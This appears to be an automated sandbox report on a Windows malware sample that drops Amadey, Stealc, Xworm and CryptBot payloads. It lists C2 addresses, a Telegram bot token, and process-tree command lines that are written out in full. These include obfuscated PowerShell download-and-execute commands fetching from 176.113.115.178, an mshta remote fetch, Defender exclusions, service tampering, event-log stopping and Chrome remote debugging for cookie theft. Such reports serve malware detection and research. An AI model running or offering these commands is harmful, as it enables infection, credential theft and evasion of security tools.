Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 02:15

General

  • Target

    2f66b770e77265722c0de698db8c61e8dcb8c8883100a9f16f5d4b92067c1667.exe

  • Size

    1.9MB

  • MD5

    15e30b215f9ffa75cb1b5286ab26b6d0

  • SHA1

    80b925698720de26222a4d7415d7a3fd711168e6

  • SHA256

    2f66b770e77265722c0de698db8c61e8dcb8c8883100a9f16f5d4b92067c1667

  • SHA512

    07671ee48bcad3227533758762185fbc7e2368eebd1466360946679cb0a47ce62c0f9b8fbc4c0f06b293bf539b9cf46d82f1b12821b4f0e1f218f61464153311

  • SSDEEP

    49152:SYoLk1jvI12b/7453Q6eRjtw4Vp3D7ZIETY9Axyh7r:9nIz3xKjW4uETY9AY5

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

C2

87.120.112.33:8398

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detect Xworm Payload 2 IoCs
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 53 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Modifies security service
      • Sets service image path in registry
      • Loads dropped DLL
      PID:476
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:596
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
              PID:1384
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1496
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks BIOS information in registry
                • Checks processor information in registry
                PID:1760
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:680
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                • Indicator Removal: Clear Windows Event Logs
                • Modifies Internet Explorer settings
                PID:744
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:808
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:848
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {67A640C1-FE1C-44A9-ACDA-74EAEEB02067} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                      3⤵
                        PID:884
                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3804
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:960
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:236
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:272
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1028
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1108
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:1052
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:496
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:1976
                                    • C:\ProgramData\Mig\Mig.exe
                                      C:\ProgramData\Mig\Mig.exe
                                      2⤵
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      PID:3872
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4048
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        3⤵
                                          PID:1304
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            4⤵
                                            • Drops file in Windows directory
                                            PID:3176
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop UsoSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:2340
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:3256
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop wuauserv
                                          3⤵
                                          • Launches sc.exe
                                          PID:3336
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop bits
                                          3⤵
                                          • Launches sc.exe
                                          PID:920
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop dosvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:3468
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          PID:3144
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          PID:3588
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          PID:3604
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          PID:3600
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                            PID:3616
                                          • C:\Windows\system32\dialer.exe
                                            C:\Windows\system32\dialer.exe
                                            3⤵
                                              PID:3576
                                            • C:\Windows\system32\dialer.exe
                                              dialer.exe
                                              3⤵
                                                PID:1900
                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                              2⤵
                                                PID:3540
                                            • C:\Windows\system32\lsass.exe
                                              C:\Windows\system32\lsass.exe
                                              1⤵
                                                PID:492
                                              • C:\Windows\system32\lsm.exe
                                                C:\Windows\system32\lsm.exe
                                                1⤵
                                                  PID:500
                                                • C:\Windows\Explorer.EXE
                                                  C:\Windows\Explorer.EXE
                                                  1⤵
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:1204
                                                  • C:\Users\Admin\AppData\Local\Temp\2f66b770e77265722c0de698db8c61e8dcb8c8883100a9f16f5d4b92067c1667.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\2f66b770e77265722c0de698db8c61e8dcb8c8883100a9f16f5d4b92067c1667.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2180
                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Loads dropped DLL
                                                      • Adds Run key to start application
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2588
                                                      • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                        4⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1436
                                                      • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:592
                                                        • C:\Windows\system32\wscript.exe
                                                          "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                          5⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2108
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                            6⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2272
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                              7⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1624
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                8⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1748
                                                                • C:\Windows\system32\mshta.exe
                                                                  mshta http://176.113.115.178/Windows-Update
                                                                  9⤵
                                                                  • Blocklisted process makes network request
                                                                  • Modifies Internet Explorer settings
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:268
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                    10⤵
                                                                    • UAC bypass
                                                                    • Blocklisted process makes network request
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Loads dropped DLL
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:764
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                      11⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1552
                                                                    • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                      "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                      11⤵
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of SetThreadContext
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1348
                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        12⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Drops file in System32 directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1324
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        12⤵
                                                                          PID:1752
                                                                          • C:\Windows\system32\wusa.exe
                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                            13⤵
                                                                            • Drops file in Windows directory
                                                                            PID:2436
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:380
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:2644
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:2672
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop bits
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:2560
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:2084
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                          12⤵
                                                                          • Power Settings
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2864
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          12⤵
                                                                          • Power Settings
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1616
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          12⤵
                                                                          • Power Settings
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3008
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                          12⤵
                                                                          • Power Settings
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2016
                                                                        • C:\Windows\system32\dialer.exe
                                                                          C:\Windows\system32\dialer.exe
                                                                          12⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2412
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe delete "LIB"
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:564
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:3520
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:3688
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe start "LIB"
                                                                          12⤵
                                                                          • Launches sc.exe
                                                                          PID:3696
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                              6⤵
                                                              • Blocklisted process makes network request
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2480
                                                              • C:\Windows\system32\ipconfig.exe
                                                                "C:\Windows\system32\ipconfig.exe" /flushdns
                                                                7⤵
                                                                • Gathers network information
                                                                PID:1956
                                                        • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2700
                                                          • C:\Users\Admin\AppData\Local\Temp\is-7D243.tmp\FunnyJellyfish.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-7D243.tmp\FunnyJellyfish.tmp" /SL5="$801CE,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2704
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                              6⤵
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2752
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /T 3
                                                                7⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Delays execution with timeout.exe
                                                                PID:2772
                                                              • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2536
                                                                • C:\Users\Admin\AppData\Local\Temp\is-O8MPD.tmp\FunnyJellyfish.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O8MPD.tmp\FunnyJellyfish.tmp" /SL5="$301C6,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:1056
                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                    "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                    9⤵
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2892
                                                                    • C:\Windows\system32\regsvr32.exe
                                                                      /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                      10⤵
                                                                      • Loads dropped DLL
                                                                      PID:2600
                                                        • C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"
                                                          4⤵
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious behavior: AddClipboardFormatListener
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2836
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:536
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:380
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1080
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1752
                                                        • C:\Users\Admin\AppData\Local\Temp\1008081001\f00ca64903.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1008081001\f00ca64903.exe"
                                                          4⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Loads dropped DLL
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1980
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                            5⤵
                                                            • Uses browser remote debugging
                                                            • Enumerates system info in registry
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:2376
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4d69758,0x7fef4d69768,0x7fef4d69778
                                                              6⤵
                                                                PID:1100
                                                              • C:\Windows\system32\ctfmon.exe
                                                                ctfmon.exe
                                                                6⤵
                                                                  PID:2416
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
